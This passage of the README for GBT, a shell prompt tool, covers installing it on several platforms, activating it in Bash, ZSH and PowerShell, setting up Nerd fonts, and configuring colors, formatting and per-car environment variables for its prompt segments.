/etc/yum.repos.d/gbt.repo >/dev/null\nsudo yum install gbt\n```\n\nUse the exact repository definition from above for all RedHat-based\ndistribution regardless its version.\n\n#### Ubuntu/Debian\n\nPackages hosted by [Packagecloud](https://packagecloud.io/gbt/release):\n\n```shell\ncurl -L https://packagecloud.io/gbt/release/gpgkey | sudo apt-key add -\necho 'deb https://packagecloud.io/gbt/release/ubuntu/ xenial main' | sudo tee /etc/apt/sources.list.d/gbt.list >/dev/null\nsudo apt-get update\nsudo apt-get install gbt\n```\n\nUse the exact repository definition from above for all Debian-based\ndistribution regardless its version.\n\n#### Mac\n\nUsing 
[`brew`](https://brew.sh):\n\n```shell\nbrew tap jtyr/repo\nbrew install gbt\n```\nOr install `gbt-git` if you would like to run the latest and greatest from the\n`master` branch:\n\n```shell\nbrew tap jtyr/repo\nbrew install --HEAD gbt-git\n```\n\n#### Windows\n\nUsing [`choco`](https://chocolatey.org):\n\n```powershell\nchoco install gbt\n```\n\nUsing [`scoop`](https://scoop.sh):\n\n```powershell\nscoop install gbt\n```\n\nOr manually by copying the `gbt.exe` file into a directory listed in the `PATH`\nenvironment variable (e.g. `C:\\Windows\\system32`).\n\n#### Android\n\nInstall [Termux](https://termux.com) from [Google Play Store](https://play.google.com/store/apps/details?id=com.termux)\nand then type this in the Termux app:\n\n```shell\napt update\napt install gbt\n```\n\n#### From the source code\n\nMake sure [Go](https://golang.org) is installed and then run the following on\nLinux and Mac:\n\n```shell\nmkdir ~/go\nexport GOPATH=~/go\nexport PATH=\"$PATH:$GOPATH/bin\"\ngo get github.com/jtyr/gbt/cmd/gbt\n```\n\nOr the following on Windows using PowerShell:\n\n```powershell\nmkdir ~/go\n$Env:GOPATH = '~/go'\n$Env:PATH = \"~/go/bin;$Env:PATH\"\ngo get github.com/jtyr/gbt/cmd/gbt\n```\n\n---\n\n### Activation\n\nAfter GBT is installed, it can be activated by calling it from the shell prompt\nvariable:\n\n```shell\n# For Bash\nPS1='$(gbt $?)'\n\n# For ZSH\nPROMPT='$(gbt $?)'\n```\n\nIf you are using ZSH together with some shell framework (e.g. [Oh My\nZSH](https://github.com/robbyrussell/oh-my-zsh)), your shell is processing a\nfair amount of shell scripts upon every prompt appearance. You can speed up your\nshell by removing the framework dependency from your configuration and replacing\nit with GBT and a [simple ZSH\nconfiguration](https://gist.github.com/jtyr/be0e6007bd22c9d51e8702a70430d116#file-zshrc-L1-L43).\nCombining a pure ZSH configuration with GBT will provide the best possible\nperformance for your shell.\n\nTo activate GBT in PowerShell, run the following in the console or store it in\nthe PowerShell profile file (`echo $profile`):\n\n```powershell\nfunction prompt {\n $rc = [int]$(-Not $?)\n $Env:GBT_SHELL = 'plain'\n $Env:PWD = get-location\n $Env:GBT_CAR_CUSTOM_EXECUTOR='powershell.exe'\n $Env:GBT_CAR_CUSTOM_EXECUTOR_PARAM='-Command'\n $gbt_output = & @({gbt $rc},{gbt.exe $rc})[$PSVersionTable.PSVersion.Major -lt 6 -or $IsWindows] | Out-String\n $gbt_output = $gbt_output -replace ([Environment]::NewLine + '$'), ''\n Write-Host -NoNewline $gbt_output\n return [char]0\n}\n# Needed only on Windows\n[console]::InputEncoding = [console]::OutputEncoding = New-Object System.Text.UTF8Encoding\n```\n\n---\n\n### Fonts and colors\n\nAlthough GBT can be configured to use only ASCII characters (see the\n[`basic`](blob/master/themes/basic.sh) theme), the default configuration uses\nsome UTF-8 characters which require a special font. In order to display all\ncharacters of the default prompt correctly, the shell should support UTF-8, and\na [Nerd](https://github.com/ryanoasis/nerd-fonts) font (or at least the\n[DejaVuSansMono\nNerd](https://github.com/ryanoasis/nerd-fonts/tree/master/patched-fonts/DejaVuSansMono/Regular/complete)\nfont) should be installed.
On Linux, you can install it like this:\n\n```shell\nmkdir ~/.fonts\ncurl -L -o ~/.fonts/DejaVuSansMonoNerdFontCompleteMono.ttf https://github.com/ryanoasis/nerd-fonts/raw/master/patched-fonts/DejaVuSansMono/Regular/complete/DejaVu%20Sans%20Mono%20Nerd%20Font%20Complete%20Mono.ttf\nfc-cache\n```\n\nOn Mac, it can be installed via `brew`:\n\n```shell\nbrew tap homebrew/cask-fonts\nbrew install --cask font-dejavu-sans-mono-nerd-font\n```\n\nOn Windows, it can be installed via `choco`:\n\n```powershell\nchoco install font-nerd-DejaVuSansMono\n```\n\nOr via `scoop`:\n\n```powershell\nscoop bucket add nerd-fonts\nscoop install DejaVuSansMono-NF\n```\n\nOr just [download](https://github.com/ryanoasis/nerd-fonts/raw/master/patched-fonts/DejaVuSansMono/Regular/complete/DejaVu%20Sans%20Mono%20Nerd%20Font%20Complete%20Mono%20Windows%20Compatible.ttf)\nthe font, open it and then install it.\n\nOnce the font is installed, it has to be set in the terminal application to\nrender all prompt characters correctly. Search for the font name `DejaVuSansMono\nNerd Font Mono` on Linux and Mac and `DejaVuSansMono NF` on Windows.\n\nIn order to have the Nerd font in Termux on Android, you have to install\n[Termux:Styling](https://play.google.com/store/apps/details?id=com.termux.styling)\napplication. Then longpress the terminal screen and select `MORE...` \u2192 `Style`\n\u2192 `CHOOSE FONT` and there choose the `DejaVu` font.\n\nSome Unix terminals might not use 256 color palette by default. In such case try\nto set the following:\n\n```shell\nexport TERM='xterm-256color'\n```\n\n\nConfiguration\n-------------\n\nThe prompt (train) is assembled from several elements (cars). The look and\nbehavior of whole train as well as each car can be influenced by a set of\nenvironment variables. To set the environment variable, use `export` in the\nLinux and Mac shell and `$Env:` on Windows.\n\n\n### Colors\n\nThe value of all `_BG` and `_FG` variables defines the background and\nforeground color of the particular element. 
The value of the color can be\nspecified in 3 ways:\n\n#### Color name\n\nOnly a limited number of named colors are supported:\n\n- ![black](https://via.placeholder.com/10/000000/000000?text=+) `black`\n- ![red](https://via.placeholder.com/10/800000/000000?text=+) `red`\n- ![green](https://via.placeholder.com/10/008000/000000?text=+) `green`\n- ![yellow](https://via.placeholder.com/10/808000/000000?text=+) `yellow`\n- ![blue](https://via.placeholder.com/10/000080/000000?text=+) `blue`\n- ![magenta](https://via.placeholder.com/10/800080/000000?text=+) `magenta`\n- ![cyan](https://via.placeholder.com/10/008080/000000?text=+) `cyan`\n- ![light_gray](https://via.placeholder.com/10/c0c0c0/000000?text=+) `light_gray`\n- ![dark_gray](https://via.placeholder.com/10/808080/000000?text=+) `dark_gray`\n- ![light_red](https://via.placeholder.com/10/ff0000/000000?text=+) `light_red`\n- ![light_green](https://via.placeholder.com/10/00ff00/000000?text=+) `light_green`\n- ![light_yellow](https://via.placeholder.com/10/ffff00/000000?text=+) `light_yellow`\n- ![light_blue](https://via.placeholder.com/10/0000ff/000000?text=+) `light_blue`\n- ![light_magenta](https://via.placeholder.com/10/ff00ff/000000?text=+) `light_magenta`\n- ![light_cyan](https://via.placeholder.com/10/00ffff/000000?text=+) `light_cyan`\n- ![white](https://via.placeholder.com/10/ffffff/000000?text=+) `white`\n- `default` (default color of the terminal)\n\nExamples:\n\n```shell\n# Set the background color of the `Dir` car to red\nexport GBT_CAR_DIR_BG='red'\n# Set the foreground color of the `Dir` car to white\nexport GBT_CAR_DIR_FG='white'\n```\n\n#### Color number\n\nA color can also be expressed as a single number in the range from `0` to\n`255`. The color of each number in that range is visible in the 256-color\nlookup table on\n[Wikipedia](https://en.wikipedia.org/wiki/ANSI_escape_code#8-bit). The named\ncolors described above are the first 16 numbers from the lookup table.\n\nExamples:\n\n```shell\n# Set the background color of the `Dir` car to red\nexport GBT_CAR_DIR_BG='1'\n# Set the foreground color of the `Dir` car to white\nexport GBT_CAR_DIR_FG='15'\n```\n\n#### RGB color\n\nAn arbitrary color can be expressed in the form of an RGB triplet.\n\nExamples:\n\n```shell\n# Set the background color of the `Dir` car to red\nexport GBT_CAR_DIR_BG='170;0;0'\n# Set the foreground color of the `Dir` car to white\nexport GBT_CAR_DIR_FG='255;255;255'\n```\n\n#### Color scheme resistance\n\nGBT uses an [8-bit color\npalette](https://en.wikipedia.org/wiki/ANSI_escape_code#8-bit) to color the\nindividual cars of the train. The first 16 colors (standard and high-intensity\ncolors) of the palette are prone to change if the terminal is using some color\nscheme (e.g.\n[Solarized](https://en.wikipedia.org/wiki/Solarized_(color_scheme))). That means\nthat if one GBT train uses a mixture of the first 16 and the remaining 240 colors,\nthe look might be inconsistent because some of the colors might change\n(depending on the color scheme) and some not. Luckily, the first 16 colors can be\nfound among the remaining 240 colors and therefore GBT can automatically convert\nthe first 16 colors into the higher colors, which provides a consistent look\nregardless of the color scheme. This works automatically for [color names](#color-name) as\nwell as for [color numbers](#color-number). If needed, the automatic conversion\ncan be disabled with the following variable:\n\n```shell\nexport GBT_FORCE_HIGHER_COLORS='0'\n```\n\n\n### Formatting\n\nFormatting is done via `_FM` variables.
The possible values are:\n\n- `normal`\n\n Makes the text normal.\n\n- `dim`\n\n Makes the text dim.\n\n- `bold`\n\n Makes the text bold. Not all font characters have variant for bold formatting.\n\n- `underline`\n\n Makes the text underlined.\n\n- `blink`\n\n Makes the text to blink.\n\n- `invert`\n\n Makes the text color inverted.\n\n- `hide`\n\n Makes the text hidden.\n\n- `none`\n\n No formatting applied.\n\n Multiple formattings can be combined into comma-separated list.\n\n Examples:\n\n ```shell\n # Set the directory name to be bold\n export GBT_CAR_DIR_FM='bold'\n # Set the directory name to be bold and underlined\n export GBT_CAR_DIR_FM='bold,underline'\n ```\n\n\n### Train variables\n\n- `GBT_CARS='Status, Os, Hostname, Dir, Git, Sign'`\n\n List of cars used in the train.\n\n To add a new car into the train, the whole variable must be redefined. For\n example in order to add the `Time` car into the default set of cars between\n the `Os` and `Hostname` car, the variable should look like this:\n\n ```shell\n export GBT_CARS='Status, Os, Time, Hostname, Dir, Git, Sign'\n ```\n\n- `GBT_RCARS='Time'`\n\n The same like `GBT_CARS` but for the right hand side prompt.\n\n ```shell\n # Add the Custom car into the right hand site car to have the separator visible\n export GBT_RCARS='Custom, Time'\n # Make the Custom car to be invisible (zero length text)\n export GBT_CAR_CUSTOM_BG='default'\n export GBT_CAR_CUSTOM_FORMAT=''\n # Show only time\n export GBT_CAR_TIME_FORMAT=' {{ Time }} '\n # Set the right hand side prompt (ZSH only)\n RPROMPT='$(gbt -right)'\n ```\n\n- `GBT_SEPARATOR='\ue0b0'`\n\n Character used to separate cars in the train.\n\n- `GBT_RSEPARATOR='\ue0b2'`\n\n The same like `GBT_SEPARATOR` but for the right hand side prompt.\n\n- `GBT_CAR_BG`\n\n Background color inherited by the top background color variable of every car.\n That allows to set the background color of all cars via single variable.\n\n- `GBT_CAR_FG`\n\n Foreground color inherited by the top foreground color variable of every car.\n That allows to set the foreground color of all cars via single variable.\n\n- `GBT_CAR_FM`\n\n Formatting inherited by the top formatting variable of every car. That allows\n to set the formatting of all cars via single variable.\n\n- `GBT_BEGINNING_BG='default'`\n\n Background color of the text shown at the beginning of the train.\n\n- `GBT_BEGINNING_FG='default'`\n\n Foreground color of the text shown at the beginning of the train.\n\n- `GBT_BEGINNING_FM='none'`\n\n Formatting of the text shown at the beginning of the train.\n\n- `GBT_BEGINNING_TEXT=''`\n\n Text shown at the beginning of the train.\n\n- `GBT_SHELL`\n\n Indicates which shell is used. The value can be either `zsh`, `bash` or\n `plain`. By default, the value is extracted from the `$SHELL` environment\n variable. Set this variable to `bash` if your default shell is ZSH but you\n want to test GBT in Bash:\n\n ```shell\n export GBT_SHELL='bash'\n bash\n ```\n If set to `plain`, no shell-specific decoration is included in the output\n text. 
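\n\n For instance, a minimal sketch (assuming `gbt` is on your `PATH` and, as in the activation examples above, takes the last exit code as its argument):\n\n ```shell\n # Print the train once without shell-specific escape wrapping,\n # e.g. to inspect or capture the generated string.\n GBT_SHELL='plain' gbt 0\n ```\n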
That's suitable for displaying the GBT-generated string in the console\n output.\n\n- `GBT_DEBUG='0'`\n\n Shows more verbose output if some of the car modules cannot be imported.\n\n\n### Cars variables\n\n#### `Aws` car\n\nCar that displays information about the local [AWS](https://aws.amazon.com/)\nconfiguration.\n\n- `GBT_CAR_AWS_BG='166'`\n\n Background color of the car.\n\n- `GBT_CAR_AWS_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_AWS_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_AWS_FORMAT=' {{ Icon }} {{ Project }} '`\n\n Format of the car.\n\n- `GBT_CAR_AWS_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_AWS_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_AWS_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_AWS_ICON_TEXT='\uf52d'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_AWS_PROFILE_BG`\n\n Background color of the `{{ Profile }}` element.\n\n- `GBT_CAR_AWS_PROFILE_FG`\n\n Foreground color of the `{{ Profile }}` element.\n\n- `GBT_CAR_AWS_PROFILE_FM`\n\n Formatting of the `{{ Profile }}` element.\n\n- `GBT_CAR_AWS_PROFILE_TEXT`\n\n Text content of the `{{ Profile }}` element specifying the configured profile.\n\n- `GBT_CAR_AWS_REGION_BG`\n\n Background color of the `{{ Region }}` element.\n\n- `GBT_CAR_AWS_REGION_FG`\n\n Foreground color of the `{{ Region }}` element.\n\n- `GBT_CAR_AWS_REGION_FM`\n\n Formatting of the `{{ Region }}` element.\n\n- `GBT_CAR_AWS_REGION_TEXT`\n\n Text content of the `{{ Region }}` element specifying the configured region.\n\n- `GBT_CAR_AWS_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_AWS_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_AWS_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_AWS_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_AWS_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_AWS_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Azure` car\n\nCar that displays information about the local [Azure](https://azure.microsoft.com/)\nconfiguration.\n\n- `GBT_CAR_AZURE_BG='32'`\n\n Background color of the car.\n\n- `GBT_CAR_AZURE_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_AZURE_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_AZURE_FORMAT=' {{ Icon }} {{ Subscription }} '`\n\n Format of the car.\n\n- `GBT_CAR_AZURE_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_AZURE_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_AZURE_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_AZURE_ICON_TEXT='\ufd03'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_AZURE_CLOUD_BG`\n\n Background color of the `{{ Cloud }}` element.\n\n- `GBT_CAR_AZURE_CLOUD_FG`\n\n Foreground color of the `{{ Cloud }}` element.\n\n- `GBT_CAR_AZURE_CLOUD_FM`\n\n Formatting of the `{{ Cloud }}` element.\n\n- `GBT_CAR_AZURE_CLOUD_TEXT`\n\n Text content of the `{{ Cloud }}` element specifying the configured cloud.\n\n- `GBT_CAR_AZURE_SUBSCRIPTION_BG`\n\n Background color of the `{{ Subscription }}` element.\n\n- `GBT_CAR_AZURE_SUBSCRIPTION_FG`\n\n Foreground color of the `{{ Subscription }}` element.\n\n- `GBT_CAR_AZURE_SUBSCRIPTION_FM`\n\n Formatting of the `{{ Subscription }}` element.\n\n- `GBT_CAR_AZURE_SUBSCRIPTION_TEXT`\n\n Text content of the `{{ Subscription }}` element specifying the configured\n 
subscription.\n\n- `GBT_CAR_AZURE_USERNAME_BG`\n\n Background color of the `{{ UserName }}` element.\n\n- `GBT_CAR_AZURE_USERNAME_FG`\n\n Foreground color of the `{{ UserName }}` element.\n\n- `GBT_CAR_AZURE_USERNAME_FM`\n\n Formatting of the `{{ UserName }}` element.\n\n- `GBT_CAR_AZURE_USERNAME_TEXT`\n\n Text content of the `{{ UserName }}` element specifying the configured user\n name.\n\n- `GBT_CAR_AZURE_USERTYPE_BG`\n\n Background color of the `{{ UserType }}` element.\n\n- `GBT_CAR_AZURE_USERTYPE_FG`\n\n Foreground color of the `{{ UserType }}` element.\n\n- `GBT_CAR_AZURE_USERTYPE_FM`\n\n Formatting of the `{{ UserType }}` element.\n\n- `GBT_CAR_AZURE_USERTYPE_TEXT`\n\n Text content of the `{{ UserType }}` element specifying the configured user\n type.\n\n- `GBT_CAR_AZURE_STATE_BG`\n\n Background color of the `{{ State }}` element.\n\n- `GBT_CAR_AZURE_STATE_FG`\n\n Foreground color of the `{{ State }}` element.\n\n- `GBT_CAR_AZURE_STATE_FM`\n\n Formatting of the `{{ State }}` element.\n\n- `GBT_CAR_AZURE_STATE_TEXT`\n\n Text content of the `{{ State }}` element specifying the configured\n subscription state.\n\n- `GBT_CAR_AZURE_DEFAULTS_GROUP_BG`\n\n Background color of the `{{ DefaultsGroup }}` element.\n\n- `GBT_CAR_AZURE_DEFAULTS_GROUP_FG`\n\n Foreground color of the `{{ DefaultsGroup }}` element.\n\n- `GBT_CAR_AZURE_DEFAULTS_GROUP_FM`\n\n Formatting of the `{{ DefaultsGroup }}` element.\n\n- `GBT_CAR_AZURE_DEFAULTS_GROUP_TEXT`\n\n Text content of the `{{ DefaultsGroup }}` element specifying the configured\n default resource group.\n\n- `GBT_CAR_AZURE_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_AZURE_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_AZURE_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_AZURE_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_AZURE_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_AZURE_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Custom` car\n\nThe main purpose of this car is to provide the possibility to create car with\ncustom text.\n\n- `GBT_CAR_CUSTOM_BG='yellow'`\n\n Background color of the car.\n\n- `GBT_CAR_CUSTOM_FG='default'`\n\n Foreground color of the car.\n\n- `GBT_CAR_CUSTOM_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_CUSTOM_FORMAT=' {{ Text }} '`\n\n Format of the car.\n\n- `GBT_CAR_CUSTOM_TEXT_BG`\n\n Background color of the `{{ Text }}` element.\n\n- `GBT_CAR_CUSTOM_TEXT_FG`\n\n Foreground color of the `{{ Text }}` element.\n\n- `GBT_CAR_CUSTOM_TEXT_FM`\n\n Formatting of the `{{ Text }}` element.\n\n- `GBT_CAR_CUSTOM_TEXT_TEXT='?'`\n\n Text content of the `{{ Text }}` element.\n\n- `GBT_CAR_CUSTOM_TEXT_CMD`\n\n The `{{ Text }}` element will be replaced by standard output of the command\n specified in this variable. 
Content of the `GBT_CAR_CUSTOM_TEXT_TEXT` variable\n takes precedence over this variable.\n\n ```shell\n # Show 1 minute loadavg as the content of the Text element\n export GBT_CAR_CUSTOM_TEXT_CMD=\"uptime | sed -e 's/.*load average: //' -e 's/,.*//'\"\n ```\n\n- `GBT_CAR_CUSTOM_TEXT_EXECUTOR='sh'`\n\n Executor used to execute the text command (`_TEXT_CMD`).\n\n- `GBT_CAR_CUSTOM_TEXT_EXECUTOR_PARAM='-c'`\n\n Parameter for the executor used to execute the text command (`_TEXT_CMD`).\n\n- `GBT_CAR_CUSTOM_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_CUSTOM_DISPLAY_CMD`\n\n Command which gets executed in order to evaluate whether the car should be\n displayed or not. Content of the `GBT_CAR_CUSTOM_DISPLAY` variable takes\n precedence over this variable.\n\n- `GBT_CAR_CUSTOM_DISPLAY_EXECUTOR='sh'`\n\n Executor used to execute the display command (`_DISPLAY_CMD`).\n\n- `GBT_CAR_CUSTOM_DISPLAY_EXECUTOR_PARAM='-c'`\n\n Parameter for the executor used to execute the display command (`_DISPLAY_CMD`).\n\n ```shell\n # Show percentage of used disk space of the root partition\n export GBT_CAR_CUSTOM_TEXT_CMD=\"df -h --output=pcent / | tail -n1 | sed -re 's/\\s//g' -e 's/%/%%/'\"\n # Display the car only if the percentage is above 70%\n export GBT_CAR_CUSTOM_DISPLAY_CMD=\"[[ $(df -h --output=pcent / | tail -n1 | sed -re 's/\\s//g' -e 's/%//') -gt 70 ]] && echo YES\"\n ```\n\n- `GBT_CAR_CUSTOM_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_CUSTOM_EXECUTOR='sh'`\n\n Executor used to execute all custom commands (`_TEXT_CMD` and `_DISPLAY_CMD`).\n\n- `GBT_CAR_CUSTOM_EXECUTOR_PARAM='-c'`\n\n Parameter for the executor used to execute all custom commands (`_TEXT_CMD`\n and `_DISPLAY_CMD`).\n\n- `GBT_CAR_CUSTOM_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_CUSTOM_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_CUSTOM_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_CUSTOM_SEP_FM`\n\n Formatting of the separator for this car.\n\nMultiple `Custom` cars can be used in the `GBT_CARS` variable. Just add some\nidentifier after the car name. To set properties of the new car, just add the\nsame identifier into the environment variable:\n\n```shell\n# Adding the Custom and Custom1 cars\nexport GBT_CARS='Status, Os, Custom, Custom1, Hostname, Dir, Git, Sign'\n# The text of the default Custom car\nexport GBT_CAR_CUSTOM_TEXT_TEXT='default'\n# The text of the Custom1 car\nexport GBT_CAR_CUSTOM1_TEXT_TEXT='1'\n# Set a different background color for the Custom1 car\nexport GBT_CAR_CUSTOM1_BG='magenta'\n```\n\n\n#### `Dir` car\n\nCar that displays the current directory name.\n\n- `GBT_CAR_DIR_BG='blue'`\n\n Background color of the car.\n\n- `GBT_CAR_DIR_FG='light_gray'`\n\n Foreground color of the car.\n\n- `GBT_CAR_DIR_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_DIR_FORMAT=' {{ Dir }} '`\n\n Format of the car.\n\n- `GBT_CAR_DIR_DIR_BG`\n\n Background color of the `{{ Dir }}` element.\n\n- `GBT_CAR_DIR_DIR_FG`\n\n Foreground color of the `{{ Dir }}` element.\n\n- `GBT_CAR_DIR_DIR_FM`\n\n Formatting of the `{{ Dir }}` element.\n\n- `GBT_CAR_DIR_DIR_TEXT`\n\n Text content of the `{{ Dir }}` element. The directory name.\n\n- `GBT_CAR_DIR_DIRSEP`\n\n OS-default character used to separate directories.\n\n- `GBT_CAR_DIR_HOMESIGN='~'`\n\n Character which represents the user's home directory.
If set to an empty\n string, the full home directory path is used instead.\n\n- `GBT_CAR_DIR_DEPTH='1'`\n\n Number of directories to show.\n\n- `GBT_CAR_DIR_NONCURLEN='255'`\n\n Indicates how many characters of the non-current directory name should be\n displayed. This can be set to `1` to display only the first character of the\n directory name when using `GBT_CAR_DIR_DEPTH` with a value greater than one.\n\n- `GBT_CAR_DIR_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_DIR_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_DIR_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_DIR_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_DIR_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_DIR_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `ExecTime` car\n\nCar that displays how long each shell command ran.\n\n- `GBT_CAR_EXECTIME_BG='light_gray'`\n\n Background color of the car.\n\n- `GBT_CAR_EXECTIME_FG='black'`\n\n Foreground color of the car.\n\n- `GBT_CAR_EXECTIME_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_EXECTIME_FORMAT=' {{ Time }} '`\n\n Format of the car.\n\n- `GBT_CAR_EXECTIME_DURATION_BG`\n\n Background color of the `{{ Duration }}` element.\n\n- `GBT_CAR_EXECTIME_DURATION_FG`\n\n Foreground color of the `{{ Duration }}` element.\n\n- `GBT_CAR_EXECTIME_DURATION_FM`\n\n Formatting of the `{{ Duration }}` element.\n\n- `GBT_CAR_EXECTIME_DURATION_TEXT`\n\n Text content of the `{{ Duration }}` element. The duration of the execution\n time (e.g. `1h8m19s135ms` for precision set to `3`).\n\n- `GBT_CAR_EXECTIME_SECONDS_BG`\n\n Background color of the `{{ Seconds }}` element.\n\n- `GBT_CAR_EXECTIME_SECONDS_FG`\n\n Foreground color of the `{{ Seconds }}` element.\n\n- `GBT_CAR_EXECTIME_SECONDS_FM`\n\n Formatting of the `{{ Seconds }}` element.\n\n- `GBT_CAR_EXECTIME_SECONDS_TEXT`\n\n Text content of the `{{ Seconds }}` element. The execution time in seconds\n (e.g. `4099.1358` for precision set to `4`).\n\n- `GBT_CAR_EXECTIME_TIME_BG`\n\n Background color of the `{{ Time }}` element.\n\n- `GBT_CAR_EXECTIME_TIME_FG`\n\n Foreground color of the `{{ Time }}` element.\n\n- `GBT_CAR_EXECTIME_TIME_FM`\n\n Formatting of the `{{ Time }}` element.\n\n- `GBT_CAR_EXECTIME_TIME_TEXT`\n\n Text content of the `{{ Time }}` element. The execution time (e.g.\n `01:08:19.1358` for precision set to `4`).\n\n- `GBT_CAR_EXECTIME_PRECISION='0'`\n\n Sub-second precision to show.\n\n- `GBT_CAR_EXECTIME_SECS`\n\n The number of seconds the command ran in the shell. This variable is defined in\n the source file as shown below.\n\n- `GBT_CAR_EXECTIME_BELL='0'`\n\n Sounds the console bell if the executed command exceeds the specified number of\n seconds.
Value set to `0` disables the bell (default).\n\n- `GBT_CAR_EXECTIME_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_EXECTIME_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_EXECTIME_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_EXECTIME_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_EXECTIME_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_EXECTIME_SEP_FM`\n\n Formatting of the separator for this car.\n\nIn order to allow this car to calculate the execution time, the following must\nbe loaded in the shell:\n\n```shell\n# For Bash\nsource /usr/share/gbt/sources/exectime/bash.sh\n# For ZSH\nsource /usr/share/gbt/sources/exectime/zsh.sh\n```\n\nOn macOS the `date` command does not support `%N` format for milliseconds and\nyou need to override the environment variable `GBT__SOURCE_DATE_ARG='+%s`.\n\n\n#### `Gcp` car\n\nCar that displays information about the local [GCP](https://cloud.google.com/)\nconfiguration.\n\n- `GBT_CAR_GCP_BG='33'`\n\n Background color of the car.\n\n- `GBT_CAR_GCP_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_GCP_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_GCP_FORMAT=' {{ Icon }} {{ Project }} '`\n\n Format of the car.\n\n- `GBT_CAR_GCP_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_GCP_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_GCP_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_GCP_ICON_TEXT='\ue7b2'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_GCP_ACCOUNT_BG`\n\n Background color of the `{{ Account }}` element.\n\n- `GBT_CAR_GCP_ACCOUNT_FG`\n\n Foreground color of the `{{ Account }}` element.\n\n- `GBT_CAR_GCP_ACCOUNT_FM`\n\n Formatting of the `{{ Account }}` element.\n\n- `GBT_CAR_GCP_ACCOUNT_TEXT`\n\n Text content of the `{{ Account }}` element specifying the configured account.\n\n- `GBT_CAR_GCP_CONFIG_BG`\n\n Background color of the `{{ Config }}` element.\n\n- `GBT_CAR_GCP_CONFIG_FG`\n\n Foreground color of the `{{ Config }}` element.\n\n- `GBT_CAR_GCP_CONFIG_FM`\n\n Formatting of the `{{ Config }}` element.\n\n- `GBT_CAR_GCP_CONFIG_TEXT`\n\n Text content of the `{{ Config }}` element specifying the active\n configuration.\n\n- `GBT_CAR_GCP_PROJECT_BG`\n\n Background color of the `{{ Project }}` element.\n\n- `GBT_CAR_GCP_PROJECT_FG`\n\n Foreground color of the `{{ Project }}` element.\n\n- `GBT_CAR_GCP_PROJECT_FM`\n\n Formatting of the `{{ Project }}` element.\n\n- `GBT_CAR_GCP_PROJECT_TEXT`\n\n Text content of the `{{ Project }}` element specifying the configured project.\n\n- `GBT_CAR_GCP_PROJECT_ALIASES`\n\n List of aliases that allow to display different project name based on the\n original name. 
